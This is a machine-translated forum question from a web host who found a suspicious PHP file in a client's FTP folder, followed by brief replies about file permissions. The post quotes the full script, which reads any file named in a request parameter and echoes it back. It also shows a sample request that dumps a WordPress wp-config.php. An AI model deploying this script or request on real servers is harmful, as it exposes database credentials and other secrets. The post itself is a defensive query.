我为客户托管一个网站,我们被要求为客户其他第三方网站商店托管一些额外的图像。这是PHP代码恶意,我如何保护我的托管?
因此,我创建了一个辅助FTP帐户,其根目录设置为托管上的某个子文件夹。
客户端有网页设计师正在构建这个外部网站的布局,在这个FTP空间的所有图像。
今天我注意到了error_log中的一些警告通知,并注意到它来自同样在这个FTP空间中的php文件。
的PHP的内容是这样的:
<?php
ini_set('display_errors',1);
$file1=trim($_REQUEST['f1']);
$read1=file_get_contents($file1);
$read1 = rawurlencode($read1);
echo "document.write(unescape(\"$read1\"))";
?>
当我第一次读码我无法弄清楚,为什么它是在FTP空间或什么没有,但我开始加入一些玩弄路径到f1参数以查看返回的响应,并且我发现我可以输出我的wordpress安装wp-config.php文件,该文件是从此FTP根文件夹返回的文件夹。
例如通过运行这个参数通过PHP脚本。它输出我的配置的内容: domain.com?f1=/mnt/storage/vhosts/domain.com/httpdocs/wordpress/wp-config.php
现在我只是想弄明白这个代码本来可以放在FTP存储中的任何其他原因,而不是恶意?
如何保护我的文件不会像这样在读取托管子文件夹的FTP访问权限时被读取?
谢谢。
只是不给任何人的根,但你... – Fusseldieb
PHP文件**将**执行,但你可以防止它对你的服务器造成损害。只需设置足够的权限,并且不**与其他用户共享一个root帐户。 – Fusseldieb
在互联网上阅读“chown”和“chmod”(如果您在服务器上使用linux) – Fusseldieb